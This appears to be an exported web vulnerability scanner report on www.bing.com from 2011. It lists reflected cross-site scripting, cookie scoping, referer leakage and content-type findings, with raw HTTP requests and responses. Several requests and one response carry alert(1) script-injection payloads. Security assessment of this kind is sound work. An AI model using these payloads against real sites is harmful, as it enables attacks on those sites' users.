1. Cross-site scripting (reflected)
2. Cookie scoped to parent domain
2.1. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b
2.3. http://www.bing.com/videos
3. Cross-domain Referer leakage
3.1. http://www.bing.com/fd/fb/mulmfg
3.3. http://www.bing.com/local/us/dc/washington/restaurants/
3.4. http://www.bing.com/maps/default.aspx
3.5. http://www.bing.com/profile/history
3.6. http://www.bing.com/search
3.7. http://www.bing.com/search
3.8. http://www.bing.com/search
3.9. http://www.bing.com/search
3.10. http://www.bing.com/search
3.11. http://www.bing.com/settings.aspx
3.12. http://www.bing.com/settings.aspx
3.13. http://www.bing.com/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/
4. Cookie without HttpOnly flag set
4.1. http://www.bing.com/local/
4.3. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b
4.4. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b/
4.5. http://www.bing.com/local/us/dc/washington/restaurants/
4.7. http://www.bing.com/videos
5.1. http://www.bing.com/travel/jsxc.vjs
5.2. http://www.bing.com/travel/scripts/sCode.js
6. Credit card numbers disclosed
7. Content type incorrectly stated
7.1. http://www.bing.com/entertainment/services/user/settings
7.2. http://www.bing.com/fd/AnswerBarHandler
7.3. http://www.bing.com/getimage
7.4. http://www.bing.com/maps/default.aspx
7.5. http://www.bing.com/search
7.6. http://www.bing.com/travel/jsdf.vjs
7.7. http://www.bing.com/travel/jsrp.vjs
Severity: | High |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /entertainment/services |
GET /entertainment/services Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: text/javascript, application/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 208 Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:06:21 GMT Connection: close jsonp1301101466664f0e30<script>alert(1)< |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/aa461'-alert(1)- |
GET /local/aa461'-alert(1)- Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://www.bing.com:80 X-BM-TraceID: 2a28fc725dfd4392bafb X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001210 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:03:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: _HOP=I=1&TS=1301101434; domain=.bing.com; path=/ Content-Length: 175 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.bing.com </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /maps |
GET /maps HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SL=true; htsk=false; cbout=false; SRCHUID=V=2&GUID |
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/maps/ P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Date: Sat, 26 Mar 2011 00:55:10 GMT Connection: close Set-Cookie: _HOP=I=2&TS=1301100910; domain=.bing.com; path=/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /videos |
GET /videos HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: http://www.bing.com P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Date: Sat, 26 Mar 2011 01:24:09 GMT Connection: close Set-Cookie: VIDSCHUSR=CLICKMODE=0 Set-Cookie: _HOP=I=1&TS=1301102649; domain=.bing.com; path=/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /fd/fb/mulmfg |
GET /fd/fb/mulmfg?IG Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/maps/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FBB=R=0; SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Content-Length: 1494 Date: Sat, 26 Mar 2011 00:56:08 GMT Connection: close <li><a href="https://login.live ...[SNIP]... </a> · <a href="http://go.microsoft ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/aa461'-alert(%2564 |
GET /local/aa461'-alert(%2564 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: b7afce04e6d243759432 SearchRequest: Microsoft.VirtualEarth SearchRequestState: X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001208 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:03:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert( Content-Length: 23624 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/us/dc/washington |
GET /local/us/dc/washington Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/local User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: 147c0045befc4bdcb48d SearchRequest: Microsoft.VirtualEarth SearchRequestState: Success X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001206 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:04:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: VE_LSV=cache=0; path=/local/us/dc Content-Length: 91062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... Image" href onclick="VE_Analytic ...[SNIP]... MDUyRUQ=" onclick="VE_Analytic ...[SNIP]... <div id="AdResultSetControl <a id="AdResultSetControl ...[SNIP]... <div id="srs_rpt1_ctl00_sritem <img id="srs_rpt1_ctl00_sritem <a id="srs_rpt1_ctl00_sritem ...[SNIP]... <div id="srs_rpt1_ctl00_sritem <a id="srs_rpt1_ctl00_sritem ...[SNIP]... </a> <a id="srs_rpt1_ctl00_sritem ...[SNIP]... <div id="srs_rpt1_ctl01_sritem <a id="srs_rpt1_ctl01_sritem ...[SNIP]... <div id="srs_rpt1_ctl02_sritem <img id="srs_rpt1_ctl02_sritem <a id="srs_rpt1_ctl02_sritem ...[SNIP]... <div id="srs_rpt1_ctl02_sritem <a id="srs_rpt1_ctl02_sritem ...[SNIP]... <div id="srs_rpt1_ctl03_sritem <a id="srs_rpt1_ctl03_sritem ...[SNIP]... </a> <a id="srs_rpt1_ctl03_sritem <a id="srs_rpt1_ctl03_sritem ...[SNIP]... <div id="srs_rpt1_ctl04_sritem <a id="srs_rpt1_ctl04_sritem ...[SNIP]... </a> <a id="srs_rpt1_ctl04_sritem ...[SNIP]... <div id="srs_rpt1_ctl05_sritem <a id="srs_rpt1_ctl05_sritem ...[SNIP]... </a> <a id="srs_rpt1_ctl05_sritem ...[SNIP]... <div id="srs_rpt1_ctl06_sritem <a id="srs_rpt1_ctl06_sritem ...[SNIP]... <div id="srs_rpt1_ctl07_sritem <img id="srs_rpt1_ctl07_sritem <a id="srs_rpt1_ctl07_sritem ...[SNIP]... <div id="srs_rpt1_ctl07_sritem <a id="srs_rpt1_ctl07_sritem ...[SNIP]... <div id="srs_rpt1_ctl08_sritem <img id="srs_rpt1_ctl08_sritem <a id="srs_rpt1_ctl08_sritem ...[SNIP]... <div id="srs_rpt1_ctl08_sritem <a id="srs_rpt1_ctl08_sritem ...[SNIP]... </a> <a id="srs_rpt1_ctl08_sritem ...[SNIP]... <div id="srs_rpt1_ctl09_sritem <a id="srs_rpt1_ctl09_sritem ...[SNIP]... </a> <a id="srs_rpt1_ctl09_sritem ...[SNIP]... wMDU0OUE=" onclick="VE_Analytic ...[SNIP]... <div id="SecondaryAdResul <a id="SecondaryAdResul ...[SNIP]... <span id="footerLinksControl ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /maps/default.aspx |
GET /maps/default.aspx Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FLCASET=Mon%2c+01+Jan |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: d9c89cedfbf14e8b9f8b X-Ve-Server: BL2-01212-20110317.509-0 X-UA-Compatible: IE=7, IE=9 X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001212 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:05:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 128046 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /profile/history |
GET /profile/history?q Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/local User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Content-Length: 29337 Date: Sat, 26 Mar 2011 01:04:28 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=events&FORM Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:05:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54870 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <h3><a href="http://eventful.com ...[SNIP]... <h3><a href="http://www.events ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://events ...[SNIP]... <h3><a href="http://washington ...[SNIP]... <h3><a href="http://events ...[SNIP]... <h3><a href="http://washington ...[SNIP]... <h3><a href="http://upcoming ...[SNIP]... <h3><a href="http://events ...[SNIP]... <h3><a href="http://events.woai ...[SNIP]... <h5><a href="http://www.sfgate ...[SNIP]... <h5><a href="http://www.nytimes ...[SNIP]... <h5><a href="http://www.sun ...[SNIP]... <h3><a href="http://358245.r.msn ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <div><a href="http://advertising ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=James+Dean&FORM Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:04:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55494 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <div><a href="http://today.msnbc ...[SNIP]... <div class="ans_msnmm"><a href="http://today.msnbc ...[SNIP]... <h5><a href="http://movies.msn ...[SNIP]... <h5><a href="http://movies.msn ...[SNIP]... <h5><a href="http://www.popeater ...[SNIP]... <h5><a href="http://www.cbsnews ...[SNIP]... <h5><a href="http://today.msnbc ...[SNIP]... <h3><a href="http://jamesdean ...[SNIP]... <h3><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www.answers ...[SNIP]... <h3><a href="http://www.imdb.com ...[SNIP]... <div class="badge bA"><a href="http://www.imdb.com ...[SNIP]... <li><a href="http://www.imdb.com ...[SNIP]... <li><a href="http://www.imdb.com ...[SNIP]... <li><a href="http://www.imdb.com ...[SNIP]... <li><a href="http://www.imdb.com ...[SNIP]... <h3><a href="http://jamesde ...[SNIP]... <h3><a href="http://www.imdb.com ...[SNIP]... <div class="badge bB"><a href="http://www.imdb.com ...[SNIP]... <h3><a href="http://www.thirdage ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://countyh ...[SNIP]... <span class="vt_con"><a href="http://www.youtube ...[SNIP]... <div class="sc_m12"><a href="http://www.youtube ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=Zip+Code+02110 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:05:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35085 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <h3><a href="http://www.city ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www ...[SNIP]... </cite> · <a href="http://cc.bingj.com ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www.zip ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www.payphone ...[SNIP]... <h3><a href="http://www.area ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=NCAA+tournament Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:03:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44425 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <div><a href="http://msn ...[SNIP]... <div class="ans_msnmm"><a href="http://msn ...[SNIP]... <h5><a href="http://msn ...[SNIP]... <h5><a href="http://msn ...[SNIP]... <h5><a href="http://msn ...[SNIP]... <h5><a href="http://www ...[SNIP]... <h5><a href="http://bleache ...[SNIP]... <h5><a href="http://www ...[SNIP]... <h3><a href="http://www.ncaa.com ...[SNIP]... <h3><a href="http://www.ncaa.com ...[SNIP]... <h3><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <div><a href="http://msn ...[SNIP]... <span><a href="http://msn ...[SNIP]... <span><a href="http://msn ...[SNIP]... <span><a href="http://msn ...[SNIP]... <span><a href="http://msn ...[SNIP]... <span><a href="http://msn ...[SNIP]... <span><a href="http://msn ...[SNIP]... <span class='sc_f2'><a href="http://msn ...[SNIP]... <span class='sc_f2'><a href="http://msn ...[SNIP]... <span class='sc_f2'><a href="http://msn ...[SNIP]... <h3><a href="http://tournament ...[SNIP]... <h3><a href="http://espn.go.com ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www.wbaltv ...[SNIP]... <h3><a href="http://rivals.yahoo ...[SNIP]... <h3><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <li><a href="http://en.wikipedia ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <h3><a href="http://930445.r.msn ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <h3><a href="http://946780.r.msn ...[SNIP]... <h3><a href="http://7881.r.msn ...[SNIP]... <h3><a href="http://0.r.msn.com/ ...[SNIP]... <div><a href="http://advertising ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=Weather+02110 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:05:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 25655 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <div class="wt_pv"><a href="http://www.foreca ...[SNIP]... <div class="wt_pv"><a href="http://www ...[SNIP]... <div class="wt_pv"><a href="http://www ...[SNIP]... <h3><a href="http://www.weather ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www.sorabji ...[SNIP]... <h3><a href="http://www ...[SNIP]... <h3><a href="http://www1.whdh ...[SNIP]... <h3><a href="http://weather ...[SNIP]... <h3><a href="http://weather ...[SNIP]... <h3><a href="http://weather.noaa ...[SNIP]... <h3><a href="http://weather.noaa ...[SNIP]... <h3><a href="http://www.rususa ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /settings.aspx |
GET /settings.aspx?ru=http%3a Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Content-Length: 19246 Date: Sat, 26 Mar 2011 00:55:58 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... to filter adult content, but it won't catch everything. If you see inappropriate content despite applying your SafeSearch setting, let us know so that we can filter it in the future. Learn more about <a href="http://onlinehelp ...[SNIP]... </strong> Ensure that SafeSearch is always on when your kids search on Bing, choose what they see online, set time limits and game restrictions, and more. Windows users can install the free download, <a href="http://g.live.com ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /settings.aspx |
GET /settings.aspx?ru=http%3a Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Content-Length: 19336 Date: Sat, 26 Mar 2011 00:56:09 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... to filter adult content, but it won't catch everything. If you see inappropriate content despite applying your SafeSearch setting, let us know so that we can filter it in the future. Learn more about <a href="http://onlinehelp ...[SNIP]... </strong> Ensure that SafeSearch is always on when your kids search on Bing, choose what they see online, set time limits and game restrictions, and more. Windows users can install the free download, <a href="http://g.live.com ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... <li><a href="http://onlinehelp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /us/dc/washington |
GET /us/dc/washington Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 404 Not Found Cache-Control: no-cache Content-Length: 8365 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:04:34 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <li><a href="http://www.msn.com/ ...[SNIP]... <li>Find more search tips in <a href="http://onlinehelp ...[SNIP]... <li><a href="http://g.live.com ...[SNIP]... <li><a href="http://go.microsoft ...[SNIP]... <li><a href="http://g.msn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/ |
GET /local/ HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
